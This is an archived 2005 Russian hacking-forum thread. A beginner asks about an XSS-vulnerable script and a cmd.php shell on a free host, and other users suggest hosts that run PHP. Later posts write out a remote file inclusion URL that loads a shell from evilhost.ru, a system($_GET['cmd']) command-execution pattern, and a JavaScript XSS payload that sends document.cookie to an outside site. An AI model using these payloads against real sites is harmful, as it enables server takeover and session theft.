Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Бажный скрипт

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [В Сети] >> Бажный скрипт

Имя

Сообщение

<< Старые топики Новые топики >>

Бажный скрипт - 2005-04-16 13:47:53

Ku4er

Сообщений: 5
Оценки: 0
Присоединился: 2005-04-16 13:15:40

Есть скрипт в урле которого есть возможность выполнить XSS нападение: [url/Sсгiрt]&template=[XSS][sm=killkill.gif] Но пытаясь выполнить: http://brodiaga.nm.ru/cmd.php?cmd=ls ничего не происходит.[sm=acckaia_sotona.gif] может я делаю что-то не то? подскажите.

Post #: 1

Бажный скрипт - 2005-04-16 15:47:30

cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13

На NM.ru нету php =)

Post #: 2

Бажный скрипт - 2005-04-16 16:22:21

Ku4er

Сообщений: 5
Оценки: 0
Присоединился: 2005-04-16 13:15:40

Если не затруднит подскажи где есть или дай ссылочку на похожий скрипт [sm=sm203.gif]

Post #: 3

Бажный скрипт - 2005-04-16 18:45:07

Nightfly

Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07

посмотри на http://idiot.ru/

Бес камментофф.

Post #: 4

Бажный скрипт - 2005-04-17 03:21:27

cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13

www.hut.ru

Post #: 5

Бажный скрипт - 2005-04-18 08:53:32

Ku4er

Сообщений: 5
Оценки: 0
Присоединился: 2005-04-16 13:15:40

Благодарю[sm=sm203.gif], hut.ru - супер[sm=em121.gif]

Post #: 6

Бажный скрипт - 2005-04-18 12:26:09

Nightfly

Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07

Или я дурак или вы гоните - для юзания пхп-инжекшена вида
http://somesite.com/index.php?name=http://evilhost.ru/shell.php
с синтаксической конструкцией вида include($_GET['name']);
Принципиально пофигу поддержка пхп, нужно чтобы хосты выдавал сорц скрипта а не уже отработанный результат - так что никто не мешает инклуднуть вобще что-то типа
http://somesite.com/index.php?name=http://evilhost.ru/shell.txt (как я как правило и делаю)

Post #: 7

Бажный скрипт - 2005-04-18 16:10:58

cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13

quote:

—————- Цитата: Дата:18.04.2005 12:26:09, Автор:Nightfly ::
Или я дурак или вы гоните - для юзания пхп-инжекшена вида http://somesite.com/index.php?name=http://evilhost.ru/shell.php с синтаксической конструкцией вида include($_GET['name']); Принципиально пофигу поддержка пхп, нужно чтобы хосты выдавал сорц скрипта а не уже отработанный результат - так что никто не мешает инклуднуть вобще что-то типа http://somesite.com/index.php?name=http://evilhost.ru/shell.txt (как я как правило и делаю)
—————-

Что ему надо я, честно говоря, так и не врубился.
Если он пишет про стоку http://brodiaga.nm.ru/cmd.php?cmd=ls, то это не инклуд баг, а system-баг, где должна быть строка system($_GET['cmd']);
Но вот что я не понял, так это:
1) Причём здесь XSS-баг?
XSS - это что-то типа ЯваСкрыптЪ:windоw.open('http://www.123.ru/index.cgi?'+ dосиmеnt.cookie);
2) Причём здесь nm.ru, если там вообще нет php?
Этот http://brodiaga.nm.ru вообще вражеский сайт или твой??
Если твой, то чего ты хотел добится выполнением этого запроса???

Я вообще не фтыкаю!

Post #: 8

Страниц: [1]

Все форумы >> [В Сети] >> Бажный скрипт

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.